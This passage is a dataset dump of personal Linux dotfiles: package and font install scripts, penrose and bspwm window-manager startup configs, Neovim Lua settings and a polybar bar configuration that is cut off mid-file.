"787d4a30ac16b068dd7aa01726185bdacd83a969", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1355, "license_type": "no_license", "max_line_length": 258, "num_lines": 29, "path": "/penrose/README.md", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "<image width=\"100px\" src=\"icon.svg\" align=\"left\"></image>\nMy Penrose Config\n=================\n\npenrose: [![Build](https://github.com/sminez/penrose/workflows/Build/badge.svg?branch=master)](https://github.com/sminez/penrose/actions?query=workflow%3ABuild) [![crates.io version](https://img.shields.io/crates/v/penrose)](https://crates.io/crates/penrose)\n\nThis is my personal config for the penrose tiling WM library.\nIt relies heavily on a number of custom scripts and external programs, in\naddition to being heavily customised for my day to day workflow. You probably\ndon't want to use everything that is here but you may find some things of\ninterest that you want for your own config.\n\n\n### Supporting files\nI have included some of the `scripts` and `.config` directories that I use in my\npersonal set up which is what you will see in the\n[YouTube](https://www.youtube.com/channel/UC04N-5DxEWH4ioK0bvZmF_Q) videos\nshowcasing penrose.\n\n\n### Wallpaper\nThe wallpaper that I use is, fittingly, a penrose tiling. It was generated using\na wonderful [online tool](https://misc.0o0o.org/penrose/) that I found which you\ncan use to generate your own wallpapers should you wish. You'll need to use a\ntool such as `imagemagick` to convert the SVG generated by the site into\nsomething like a PNG so that you can use it as a wallpaper.\n\n\n![wallpaper](wallpaper.png)\n" }, { "alpha_fraction": 0.7804877758026123, "alphanum_fraction": 0.7804877758026123, "avg_line_length": 16.571428298950195, "blob_id": "338c377af784b696e67d437d76b65dd6c5ad6e89", "content_id": "e988698a5b29dc006e990521714642168790c09a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 123, "license_type": "no_license", "max_line_length": 28, "num_lines": 7, "path": "/install-arch.sh", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "sudo dependencies-arch.sh.sh\nsh oh-my-zsh.sh\nsh config.sh\nsh source-code-pro.sh\nsh rust.sh\nsh gitconfig.sh\nsh alacritty.sh\n" }, { "alpha_fraction": 0.745945930480957, "alphanum_fraction": 0.7513513565063477, "avg_line_length": 45.25, "blob_id": "977e250862b3eee20bd21be277647087e1b2f496", "content_id": "8c30a5d7ec557836cddd1dcd0732251941f0ae6e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 185, "license_type": "no_license", "max_line_length": 69, "num_lines": 4, "path": "/penrose/scripts/lock-screen", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "#! /bin/bash\n# Run the multi-monitor aware lock script with a custom icon and font\n# The script itself is `i3lock-fancy`\nbash ~/bin/scripts/lock --pixelate --font ProFont-for-Powerline\n" }, { "alpha_fraction": 0.6191319823265076, "alphanum_fraction": 0.6324180960655212, "avg_line_length": 31.257143020629883, "blob_id": "185e83bc3a7dffc924f2197888d4622be1435261", "content_id": "f0f6ec40e00c8526a615a5449fb0943603104514", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1129, "license_type": "no_license", "max_line_length": 94, "num_lines": 35, "path": "/penrose/scripts/penrose-startup.sh", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "#! /usr/bin/env bash\n# ----------------------------------------\n# Bootstrap the start of a penrose session\n# >> This get's run on restart as well!\n# ----------------------------------------\n\n# Make sure we only run once\npid=$$\npgrep -fi penrose-startup.sh | grep -v \"^$pid$\" | xargs kill\n\n# Set screen resolutions (add additional screens here)\nxrandr --output HDMI-1 --auto --right-of eDP-1 &\n\nrunning() { pgrep -fi \"$1\" >/dev/null; }\n\nrunning kdeconnnectd || /usr/lib/kdeconnectd &\nrunning nm-applet || nm-applet &\nrunning udiskie || udiskie -a -n -t &\nrunning xautolock || xautolock \\\n -detectsleep \\\n -time 3 \\\n -locker \"$HOME/bin/lock-screen\" \\\n -notify 30 \\\n -notifier \"notify-send -u critical -t 120 -- 'LOCKING screen in 30 seconds...'\" &\nrunning volumeicon || volumeicon &\nrunning dunst || dunst &\nrunning blueman-applet || blueman-applet &\nrunning xfce4-power-manager || xfce4-power-manager &\nrunning gnome-keyring-daemon || gnome-keyring-daemon --start --components=pkcs11,secrets,ssh &\n\n\"$HOME/.fehbg\"\n\"$HOME/.config/polybar/launch.sh\" &\n\n# see run-penrose.sh\n[[ -z \"$RESTARTED\" ]] && \"$HOME/bin/unlock-ssh.sh\" &\n" }, { "alpha_fraction": 0.6659209728240967, "alphanum_fraction": 0.7158836722373962, "avg_line_length": 28.15217399597168, "blob_id": "c46b1dca1fd7d405cf6dc3348e3893353b7be9f4", "content_id": "6f275afbca39732398ee3006033001cdcb2e0069", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1341, "license_type": "no_license", "max_line_length": 114, "num_lines": 46, "path": "/bspwm/.config/bspwm/bspwmrc", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "#! /bin/sh\n\n\npgrep -x sxhkd > /dev/null || sxhkd &\nxrandr --output DP-2 --mode 2560x1440 -r 240.00 --primary --right-of DP-0 --output DP-0 --mode 2560x1440 -r 120.00\n\nbspc monitor DP-2 -d 1 2 3 4 5 6 7 8\nbspc monitor DP-0 -d 9\nbspc wm --reorder-monitors DP-2 DP-0\nbspc monitor -f DP-2\n\nbspc config border_width 1\nbspc config window_gap 12\n\nbspc config split_ratio 0.52\nbspc config borderless_monocle true\nbspc config gapless_monocle true\nbspc config normal_border_color '#fdf6e3'\nbspc config focused_border_color '#0d667d'\nbspc config gapless_monocle false\n\n\nbspc rule -a Gimp desktop='^8' state=floating follow=off\nbspc rule -a Chromium desktop='^4'\nbspc rule -a mplayer2 state=floating\nbspc rule -a Kupfer.py focus=on\nbspc rule -a Screenkey manage=off\nbspc rule -a Steam desktop='^9' state=tiled follow=off\nbspc rule -a Emacs state=tiled\nbspc rule -a Terminator state=tiled\n\n\n#xrdb ~/.Xresources\n#compton --config ~/compton.conf &\n#feh --bg-scale dotfiles/wallpapers/firewatch-blue.jpg &\n#polybar example &\n#xinput --set-prop 10 'Device Accel Profile' -1 &\n#xset s 0 s blank &\n#xset -dpms &\n#xrandr -r 120 &\n#xsetroot -cursor_name left_ptr &\n#gsettings set org.gnome.desktop.background show-desktop-icons false &\n#emacs --daemon\nfeh --bg-scale dotfiles/wallpapers/nms.png &\nxset s 0 s blank &\nxset -dpms &\n" }, { "alpha_fraction": 0.6396760940551758, "alphanum_fraction": 0.7206477522850037, "avg_line_length": 29.875, "blob_id": "87429ce9411feb4d06084e79d8df29c54de17f50", "content_id": "94438156f399783a690374fdf3a1d074527a65a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 247, "license_type": "no_license", "max_line_length": 83, "num_lines": 8, "path": "/source-code-pro.sh", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "#!/bin/bash\nmkdir /tmp/adodefont\ncd /tmp/adodefont\nwget https://github.com/adobe-fonts/source-code-pro/archive/2.010R-ro/1.030R-it.zip\nunzip 1.030R-it.zip\nmkdir -p ~/.fonts\ncp source-code-pro-2.010R-ro-1.030R-it/OTF/*.otf ~/.fonts/\nfc-cache -f -v\n" }, { "alpha_fraction": 0.6394635438919067, "alphanum_fraction": 0.6394635438919067, "avg_line_length": 40.89523696899414, "blob_id": "1b23871ccf24be59648c6d73f0b4f18e25a4f8fa", "content_id": "af241f156023845d098240218d673296a08fee76", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Lua", "length_bytes": 4407, "license_type": "no_license", "max_line_length": 181, "num_lines": 105, "path": "/nvim/oldconfig/lua/nvim-lspconfig.lua", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "require(\"mason\").setup()\nrequire(\"mason-lspconfig\").setup({\n ensure_installed = { \"sumneko_lua\", \"rust_analyzer\" }\n})\nlocal function on_attach(client, bufnr)\n\tlocal function buf_set_keymap(...)\n\t\tvim.api.nvim_buf_set_keymap(bufnr, ...)\n\tend\n\tlocal function buf_set_option(...)\n\t\tvim.api.nvim_buf_set_option(bufnr, ...)\n\tend\n\n\tbuf_set_option(\"omnifunc\", \"v:lua.vim.lsp.omnifunc\")\n\n\t-- Mappings.\n\tlocal opts = { noremap = true, silent = true }\n\n\tbuf_set_keymap(\"n\", \"gD\", \"<Cmd>lua vim.lsp.buf.declaration()<CR>\", opts)\n\tbuf_set_keymap(\"n\", \"gd\", \"<Cmd>lua vim.lsp.buf.definition()<CR>\", opts)\n\tbuf_set_keymap(\"n\", \"K\", \"<Cmd>lua vim.lsp.buf.hover()<CR>\", opts)\n\tbuf_set_keymap(\"n\", \"gi\", \"<cmd>lua vim.lsp.buf.implementation()<CR>\", opts)\n\tbuf_set_keymap(\"n\", \"<C-k>\", \"<cmd>lua vim.lsp.buf.signature_help()<CR>\", opts)\n\tbuf_set_keymap(\"n\", \"<space>wa\", \"<cmd>lua vim.lsp.buf.add_workspace_folder()<CR>\", opts)\n\tbuf_set_keymap(\"n\", \"<space>wr\", \"<cmd>lua vim.lsp.buf.remove_workspace_folder()<CR>\", opts)\n\tbuf_set_keymap(\"n\", \"<space>wl\", \"<cmd>lua print(vim.inspect(vim.lsp.buf.list_workspace_folders()))<CR>\", opts)\n\tbuf_set_keymap(\"n\", \"<space>D\", \"<cmd>lua vim.lsp.buf.type_definition()<CR>\", opts)\n\tbuf_set_keymap(\"n\", \"<space>rn\", \"<cmd>lua vim.lsp.buf.rename()<CR>\", opts)\n\tbuf_set_keymap(\"n\", \"gr\", \"<cmd>Trouble lsp_references<CR>\", opts)\n\tbuf_set_keymap(\"n\", \"<space>e\", \"<cmd>lua vim.lsp.diagnostic.show_line_diagnostics()<CR>\", opts)\n\tbuf_set_keymap(\"n\", \"[d\", \"<cmd>lua vim.lsp.diagnostic.goto_prev()<CR>\", opts)\n\tbuf_set_keymap(\"n\", \"]d\", \"<cmd>lua vim.lsp.diagnostic.goto_next()<CR>\", opts)\n\tbuf_set_keymap(\"n\", \"<space>q\", \"<cmd>lua vim.lsp.diagnostic.set_loclist()<CR>\", opts)\n\n\tbuf_set_keymap(\"n\", \"<Leader>mo\", [[<Cmd>lua require('telescope.builtin').lsp_document_symbols()<CR>]], opts)\n\tbuf_set_keymap(\"n\", \"<Leader>gr\", [[<Cmd>lua require('telescope.builtin').lsp_references()<CR>]], opts)\n\tbuf_set_keymap(\"n\", \"<Leader>gi\", [[<Cmd>lua require('telescope.builtin').lsp_implementations()<CR>]], opts)\n buf_set_keymap('n', '<space>rn', '<cmd>lua vim.lsp.buf.rename()<CR>', opts)\n\tbuf_set_keymap(\"n\", \"<space>f\", \"<cmd>lua vim.lsp.buf.formatting()<CR>\", opts)\n\n\t-- Set some keybinds conditional on server capabilities\n\tif client.server_capabilities.document_formatting then\n\t\tbuf_set_keymap(\"n\", \"<space>f\", \"<cmd>lua vim.lsp.buf.formatting()<CR>\", opts)\n\telseif client.server_capabilities.document_range_formatting then\n\t\tbuf_set_keymap(\"n\", \"<space>f\", \"<cmd>lua vim.lsp.buf.range_formatting()<CR>\", opts)\n\tend\nend\n\n-- lspInstall + lspconfig stuff\n\nlocal function setup_servers()\n\tlocal capabilities = vim.lsp.protocol.make_client_capabilities()\n\t-- For autoimport in rust analyzer\n\tcapabilities.textDocument.completion.completionItem.resolveSupport = {\n\t\tproperties = {\n\t\t\t\"additionalTextEdits\",\n\t\t},\n\t}\n require('lspconfig')['rust_analyzer'].setup{\n capabilities = capabilities,\n on_attach = on_attach,\n\t\tsettings = {\n\t\t\t[\"rust-analyzer\"] = {\n\t\t\t\tdiagnostics = {\n\t\t\t\t\tenable = false,\n\t\t\t\t},\n\t\t\t\tcheckOnSave = {\n\t\t\t\t\tcommand = \"clippy\",\n\t\t\t\t},\n workspace = {\n symbol = {\n search = {\n kind = \"all_symbols\"\n }\n }\n }\n\t\t\t},\n\t\t},\n\t\thandlers = {\n\t\t\t[\"textDocument/publishDiagnostics\"] = vim.lsp.with(vim.lsp.diagnostic.on_publish_diagnostics, {\n\t\t\t\tvirtual_text = true,\n\t\t\t\tsigns = false,\n\t\t\t\tupdate_in_insert = false,\n\t\t\t}),\n\t\t},\n }\n require('lspconfig')['clangd'].setup{}\nend\n\nsetup_servers()\n\nrequire(\"lsp_extensions\").inlay_hints({\n\thighlight = \"Comment\",\n\tprefix = \" > \",\n\taligned = false,\n\tonly_current_line = false,\n\tenabled = { \"TypeHint\", \"ChainingHint\", \"ParameterHint\" },\n})\n--vim.api.nvim_command([[\n-- autocmd BufEnter,BufWinEnter,TabEnter *.rs :lua require'lsp_extensions'.inlay_hints{ prefix = '', highlight = \"Comment\", enabled = {\"TypeHint\", \"ChainingHint\", \"ParameterHint\"}}\n--]])\n\nvim.fn.sign_define(\"LspDiagnosticsSignError\", { text = \"\", numhl = \"LspDiagnosticsDefaultError\" })\nvim.fn.sign_define(\"LspDiagnosticsSignWarning\", { text = \"\", numhl = \"LspDiagnosticsDefaultWarning\" })\nvim.fn.sign_define(\"LspDiagnosticsSignInformation\", { text = \"\", numhl = \"LspDiagnosticsDefaultInformation\" })\nvim.fn.sign_define(\"LspDiagnosticsSignHint\", { text = \"\", numhl = \"LspDiagnosticsDefaultHint\" })\n" }, { "alpha_fraction": 0.5245901346206665, "alphanum_fraction": 0.5327869057655334, "avg_line_length": 19.33333396911621, "blob_id": "b48cf2dcfef1290f4da5c7fb738fcff820f9189c", "content_id": "e9811b346ceb30a309f9ca1a54b24da60aa3b767", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Lua", "length_bytes": 122, "license_type": "no_license", "max_line_length": 31, "num_lines": 6, "path": "/awesome/config/apps.lua", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "return {\n screenshot = \"i3-scrot -s\",\n terminal = \"kitty -e tmux\",\n -- terminal = \"kitty\",\n editor = \"nvim\"\n}\n" }, { "alpha_fraction": 0.7055837512016296, "alphanum_fraction": 0.7055837512016296, "avg_line_length": 23.625, "blob_id": "2439f61130f2818c1eebfd3661ab50e6b44c7cb8", "content_id": "33220b096b7c9ae3827f8462675972f7a810764c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 197, "license_type": "no_license", "max_line_length": 70, "num_lines": 8, "path": "/penrose/scripts/run-penrose.sh", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n\nwhile true; do\n # log out to a file\n /home/maik/dotfiles/penrose/target/release/penrose &> ~/.penrose.log\n mv ~/.penrose.log ~/prev-penrose.log\n export RESTARTED=true\ndone\n" }, { "alpha_fraction": 0.6571428775787354, "alphanum_fraction": 0.6571428775787354, "avg_line_length": 34, "blob_id": "705f5763e006b6137140816af27a2367a46503c8", "content_id": "3607bdbc14df45ea7afcb3cd92e9179c9450043d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 35, "license_type": "no_license", "max_line_length": 34, "num_lines": 1, "path": "/install_pacman.sh", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "pacman -S --needed - < pkglist.txt\n" }, { "alpha_fraction": 0.5408163070678711, "alphanum_fraction": 0.5476190447807312, "avg_line_length": 15.771428108215332, "blob_id": "a22f5d09f466d8a5e09da35ab80ab4cf2c3e75d1", "content_id": "e20333f85b0070eb00e0e119d8834b215862b298", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 588, "license_type": "no_license", "max_line_length": 66, "num_lines": 35, "path": "/dependencies-arch.sh", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "sudo pacman -Syu\nsudo pacman -S \\\n git \\\n vim \\\n wget \\\n cmake \\\n make \\\n rofi \\\n pavucontrol \\\n emacs \\\n rxvt-unicode \\\n tmux \\\n compton \\\n nitrogen \\\n neovim \\\n zsh \\\n curl \\\n i3-wm \\\n steam \\\n feh \\\n scrot \\\n gimp \\\n peek \\\n xclip \\\n bspwm \\\n powerline-fonts \\\n freetype2 \\\n fontconfig \\\n pkg-config \\\n\ngit clone https://github.com/syl20bnr/spacemacs /tmp/.emacs.d\ncp -f -R /tmp/.emacs.d ~/.emacs.d\n\ngit clone https://github.com/robbyrussell/oh-my-zsh /tmp/oh-my-zsh\ncp -f -R /tmp/oh-my-zsh ~/oh-my-zsh\n\n" }, { "alpha_fraction": 0.7122950553894043, "alphanum_fraction": 0.7270491719245911, "avg_line_length": 21.592592239379883, "blob_id": "edbd91e21bea9060ca988c1d4353e354d37e80d0", "content_id": "e0af16bf15e2b4ca586fa5d6a7af5da76db011c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Lua", "length_bytes": 1222, "license_type": "no_license", "max_line_length": 60, "num_lines": 54, "path": "/nvim/oldconfig/lua/options.lua", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "local vim = vim\nlocal opt = vim.opt\nlocal g = vim.g\nlocal cmd = vim.cmd\n\nopt.ruler = false\nopt.hidden = true\nopt.ignorecase = true\nopt.splitbelow = true\nopt.splitright = true\nopt.termguicolors = true\nopt.cul = true\nopt.mouse = \"a\"\nopt.signcolumn = \"no\"\nopt.cmdheight = 1\nopt.updatetime = 250 -- update interval for gitsigns\nopt.timeoutlen = 400\nopt.expandtab = true\nopt.shiftwidth = 2\nopt.smartindent = true\nopt.whichwrap:append(\"<>hl\")\nopt.pumheight = 20\nopt.foldmethod = \"manual\"\nopt.list = true\nopt.smartindent = true\nopt.expandtab = true\nopt.syntax = \"on\"\nopt.shiftwidth = 4\nopt.tabstop = 4\nopt.virtualedit = \"\"\nopt.number = true\nopt.relativenumber = true\n\ng.mapleader = \" \"\ng.auto_save = 0\ng.backspace = \"eol,start,indent\"\ng.whichwrap = \"<,>,h,l\"\ng.indentLine_enabled = 1\ng.indent_blankline_char = \"▏\"\n\ng.indent_blankline_filetype_exclude = { \"help\", \"terminal\" }\ng.indent_blankline_buftype_exclude = { \"terminal\" }\n\ng.indent_blankline_show_trailing_blankline_indent = false\ng.indent_blankline_show_first_indent_level = false\n\ncmd(\"set tm=2000\")\ncmd(\"set smarttab\")\ncmd(\"set noswapfile\")\n\nopt.background = \"dark\"\ng.tokyonight_transparent_sidebar = true\ng.tokyonight_transparent = true\ncmd(\"colorscheme tokyonight\")\n" }, { "alpha_fraction": 0.6093294620513916, "alphanum_fraction": 0.6195335388183594, "avg_line_length": 19.147058486938477, "blob_id": "4c64d3a859797fb4fec5072641b342803899537f", "content_id": "ff6a1aca95949218d054faf16033090e57597ef9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 686, "license_type": "no_license", "max_line_length": 66, "num_lines": 34, "path": "/dependencies.sh", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "sudo add-apt-repository ppa:peek-developers/stable\nsudo add-apt-repository ppa:neovim-ppa/stable\nsudo add-apt-repository ppa:daveg/i3-gaps\nsudo apt update\nsudo apt install \\\n git \\\n vim \\\n wget \\\n cmake \\\n make \\\n rofi \\\n pavucontrol \\\n emacs \\\n rxvt-unicode-256color \\\n tmux \\\n compton \\\n nitrogen \\\n software-properties-common \\\n neovim \\\n zsh \\\n curl \\\n i3-wm \\\n steam \\\n feh \\\n scrot \\\n gimp \\\n peek \\\n xclip \\\n\ngit clone https://github.com/syl20bnr/spacemacs /tmp/.emacs.d\ncp -f -R /tmp/.emacs.d ~/.emacs.d\n\ngit clone https://github.com/robbyrussell/oh-my-zsh /tmp/oh-my-zsh\ncp -f -R /tmp/oh-my-zsh ~/oh-my-zsh\n\n" }, { "alpha_fraction": 0.6289411783218384, "alphanum_fraction": 0.6777722239494324, "avg_line_length": 20.80499267578125, "blob_id": "90d7abed9dcc812267f49bc205d42d1ddc044c4b", "content_id": "10d0742d07b5d94dcc9952660f5cf7275d1bec9c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 14173, "license_type": "no_license", "max_line_length": 170, "num_lines": 641, "path": "/polybar/.config/polybar/config", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": " ;=====================================;\n ; ____ _ _ ;\n ;| _ \\ ___ | |_ _| |__ __ _ _ __ ;\n ;| |_) / _ \\| | | | | '_ \\ / _` | '__|;\n ;| __/ (_) | | |_| | |_) | (_| | | ;\n ;|_| \\___/|_|\\__, |_.__/ \\__,_|_| ;\n ; |___/ ;\n ;=====================================;\n\n[colors]\nbackground = #1c2c43\nbackground-alt = #0e1827\nforeground = #FEFEFE\nforeground-alt = #9ac4ff\nprimary = #fff\nsecondary = #a9b3c2\nbackground-level= #cec8d8ff\nalert = #ff004b\n\n[bar/level]\nwidth = 19%\nheight = 4.3%\noffset-x = 40.5%\noffset-y = 5%\nradius = 22\nfixed-center = true\nbottom = false\n\nbackground = ${colors.background-level}\nforeground = ${colors.background}\n\npadding-left = 2\npadding-right = 2\n\nmodule-margin-left = 0\nmodule-margin-right = 1\n \nfont-0 = UbuntuMono Nerd Font:pixelsize=14:style=Medium Condensed;5\nfont-1 = Material Design Icons Desktop:pixelsize=20;5\nfont-2 = UbuntuMono Nerd Font:pixelsize=20:style=Medium Condensed;7\n \nmodules-center = xbacklight pulseaudio\n\noverride-redirect = true\nenable-ipc = true\n\n[bar/control]\nwidth = 8%\nheight = 4.3%\noffset-x = 0%:10\noffset-y = 0.65%\nradius = 22\nfixed-center = true\nbottom = true\n\nbackground = ${colors.background}\nforeground = ${colors.foreground}\n\nborder-size = 0\nborder-color = #000\n\npadding-left = 0\npadding-right = 0\n\nmodule-margin-left = 2\nmodule-margin-right = 2\n \nfont-0 = BreezeSans:pixelsize=14:style=Medium Condensed;4\nfont-1 = Material Design Icons Desktop:pixelsize=20;5\nfont-2 = BreezeSans:pixelsize=10:style=Bold Condensed;3\n \nmodules-center = search screenshot file-man \n\nwm-restack = bspwm\n\nscroll-up = bspwm-desknext\nscroll-down = bspwm-deskprev\n\ncursor-click = pointer\ncursor-scroll = default\n\n[bar/workspace]\nwidth = 24%\nheight = 4.85%\noffset-x = 8%:10\noffset-y = 0%\nradius = 0\nfixed-center = true\nbottom = true\n\nbackground = #00000000\nforeground = ${colors.foreground}\n\npadding-left = 2\npadding-right = 0\n\nmodule-margin-left = 0\nmodule-margin-right = 0\n \nfont-0 = Material Design Icons Desktop:pixelsize=26;1\nfont-1 = BreezeSans:pixelsize=28:style=Regular Condensed;-2\nfont-2 = Material Design Icons Desktop:pixelsize=18;-10\n \nmodules-left = bspwm\n\nwm-restack = bspwm\n\nscroll-up = bspwm-desknext\nscroll-down = bspwm-deskprev\n\ncursor-click = pointer\ncursor-scroll = default\n\n[bar/music]\nwidth = 30%\nheight = 4.3%\noffset-x = 35%\noffset-y = 6%:1\nradius = 22\nfixed-center = true\nbottom = true\n\nbackground = #00191414\nforeground = #fff\n\nborder-size = 0\nborder-color = #000\n\npadding-left = 2\npadding-right = 2\n\nmodule-margin-left = 0\nmodule-margin-right = 0\n \nfont-0 = BreezeSans:pixelsize=16:style=Medium Condensed;2\nfont-1 = Font Awesome 5 Pro:pixelsize=20:style=Solid;3\nfont-2 = Font Awesome 5 Brands:pixelsize=21;3\nfont-3 = SourceHanSansJP:pixelsize=14:style=Medium;2\nfont-4 = Font Awesome 5 Pro:pixelsize=18:style=Solid;3\nfont-5 = UbuntuMono Nerd Font Mono:pixelsize=36:style=Medium Condensed;7\nfont-6 = Noto Sans Mono:pixelsize=14:style=Medium;2\nfont-7 = BreezeSans:pixelsize=14:style=Medium Condensed;2\n \nmodules-center = right song left\n\noverride-redirect = true\n\nscroll-up = bspwm-desknext\nscroll-down = bspwm-deskprev\n\ncursor-click = pointer\n\n[bar/player]\nwidth = 11%\nheight = 4.3%\noffset-x = 44.5%\noffset-y = 0.65%\nradius = 22 \nfixed-center = true\nbottom = true\n\nbackground = ${colors.background-alt}\nforeground = ${colors.foreground-alt}\n\nborder-size = 0\n\npadding-left = 6\npadding-right = 6\n\nmodule-margin-left = 2\nmodule-margin-right = 3\n \nfont-0 = BreezeSans:pixelsize=16:style=Medium Condensed;2\nfont-1 = Font Awesome 5 Pro:pixelsize=20:style=Regular;3\nfont-2 = Font Awesome 5 Brands:pixelsize=21;3\nfont-3 = SourceHanSansJP:pixelsize=14:style=Medium;2\nfont-4 = Font Awesome 5 Pro:pixelsize=18:style=Solid;3\n \nmodules-left = info\nmodules-center = prev toggle next\n\nwm-restack = bspwm\n\nscroll-up = bspwm-desknext\nscroll-down = bspwm-deskprev\n\ncursor-click = pointer\ncursor-scroll = default\n\n[bar/close]\nwidth = 2.35%\nheight = 4.1%\noffset-x = 65.65%:-40\noffset-y = 0.75%\nradius = 22\nfixed-center = true\nbottom = true\n\nbackground = ${colors.background-alt}\nforeground = ${colors.primary}\n\nborder-size = 0\nborder-color = #000\n\npadding-left = 0\npadding-right = 0\n\nmodule-margin-left = 0\nmodule-margin-right = 0\n \nfont-0 = Material Design Icons Desktop:pixelsize=22;5\nfont-1 = BreezeSans:pixelsize=18:style=Medium Condensed;2\n \nmodules-center = close-menu \n\nwm-restack = bspwm\n\ncursor-click = pointer\ncursor-scroll = default\n\nclick-left = ~/.config/polybar/scripts/close.sh &\n\n[bar/notify]\nwidth = 14%\nheight = 4.3%\noffset-x = 68%:-30\noffset-y = 0.65%\nradius = 22\nfixed-center = true\nbottom = true\n\nbackground = ${colors.background-alt}\nforeground = ${colors.foreground-alt}\n\nborder-size = 0\nborder-color = #000\n\npadding = 0\n\nmodule-margin-left = 2\nmodule-margin-right = 3\n \nfont-0 = BreezeSans:pixelsize=10:style=Bold;-10\nfont-1 = Material Design Icons Desktop:pixelsize=22;5\nfont-2 = BreezeSans:pixelsize=10:style=Light Condensed;10\nfont-3 = Material Design Icons Desktop:pixelsize=10;10\nfont-4 = Material Design Icons Desktop:pixelsize=10;-8\nfont-5 = icomoon:pixelsize=17;4\n\nmodules-center = cpu update news mtorrent\n\nwm-restack = bspwm\n\ncursor-click = pointer\ncursor-scroll = default\n\n[bar/open]\nwidth = 2.35%\nheight = 4.1%\noffset-x = 79.65%:-30\noffset-y = 0.75%\nradius = 22\nfixed-center = true\nbottom = true\n\nbackground = ${colors.background-alt}\nforeground = ${colors.primary}\n\nborder-size = 0\nborder-color = #000\n\npadding-left = 0\npadding-right = 0\n\nmodule-margin-left = 0\nmodule-margin-right = 0\n \nfont-0 = Material Design Icons Desktop:pixelsize=22;5\nfont-1 = BreezeSans:pixelsize=18:style=Medium Condensed;2\n \nmodules-center = open-menu \n\nwm-restack = bspwm\n\ncursor-click = pointer\ncursor-scroll = default\n\nclick-left = ~/.config/polybar/scripts/open.sh &\n\n[bar/status]\nwidth = 16%\nheight = 4.3%\noffset-x = 82.0%:-20\noffset-y = 0.65%\nradius = 22\nfixed-center = true\nbottom = true\n\nbackground = ${colors.background}\nforeground = ${colors.foreground}\n\nborder-size = 0\nborder-color = #000\n\npadding-left = 0\npadding-right = 0\n\nmodule-margin-left = 1\nmodule-margin-right = 1\n \nfont-0 = BreezeSans:pixelsize=14:style=Medium Condensed;4\nfont-1 = Material Design Icons Desktop:pixelsize=21;5\nfont-2 = BreezeSans:pixelsize=10:style=Bold Condensed;3\n \nmodules-center = wlan battery bluetooth date \n\nwm-restack = bspwm\n\ncursor-click = pointer\ncursor-scroll = default\n\n[bar/power]\nwidth = 2.1%\nheight = 3.7%\noffset-x = 97.9%:-10\noffset-y = 0.88%\nradius = 20\nfixed-center = true\nbottom = true\n\nbackground = ${colors.alert}\nforeground = #fff\n\nborder-size = 0\nborder-color = #000\n\npadding-left = 5\npadding-right = 0\n\nmodule-margin-left = 1\nmodule-margin-right = 1\n \nfont-0 = Material Design Icons Desktop:pixelsize=23;6\n \nmodules-center = power-menu \n\nwm-restack = bspwm\n\nscroll-up = bspwm-desknext\nscroll-down = bspwm-deskprev\n\ncursor-click = pointer\ncursor-scroll = default\n\nclick-left = ~/.config/polybar/scripts/power-menu.sh &\n\n[module/bspwm]\ntype = internal/bspwm\n\nreverse-scroll = false\nenable-scroll = false\n\nws-icon-0 = I;%{A3:alacritty &:}󰆍%{A}\nws-icon-1 = II;%{F#00c0ff}%{A3:qutebrowser &:}󰇧%{A}%{F-}\nws-icon-2 = III;%{F#ff004b}%{A3:grep \" T \" /tmp/mpv-wpf.txt | tail -1 | cut -d' ' -f2| xargs -L1 -I[] xdotool key --window \"[]\" p &:}󰄘%{A}%{F-}\nws-icon-3 = IV;%{F#ffca00}%{A3:start-newsboat.sh &:}󰇰%{A}%{F-}\nws-icon-4 = V;%{F#2944f2}%{A3:start-vim.sh -c &:}󰹻%{A}%{F-}\nws-icon-5 = VI;%{F#c46a4b}%{A3:zathura &:}󰉨%{A}%{F-}\nws-icon-6 = VII;%{F#ff93aa}%{A3:gimp &:}󰿁%{A}%{F-}\nws-icon-7 = VIII;%{F#FF8C00}%{A3:retroarch &:}󰊠%{A}%{F-}\nws-icon-8 = IX;%{F#d448ff}%{A3:discord &:}󰆉%{A}%{F-}\nws-icon-9 = X;%{F#05d183}%{A3:start-spotify || playerctl -p spotify play-pause &:}󰫔%{A}%{F-}\nws-icon-default =%{F#9e43ba}%{A3:<!!>:}󰗹%{A}%{F-}\n\nformat = \"<label-state>\" \n\nlabel-focused =\"{%{A1:bspc node -f next.local.!floating:}%{A2:xdo close:}%icon%%{A}%{A}} \"\nlabel-focused-padding = 0\n\nlabel-occupied =\"%icon% \"\nlabel-occupied-padding = 0\n\nlabel-urgent =\"%icon%%{F#ff004b}%{T3}%{O-12}󰀨 %{T-}%{F-}\"\nlabeel-foreground= ${color.alert}\nlabel-urgent-padding = 0\n\nlabel-empty 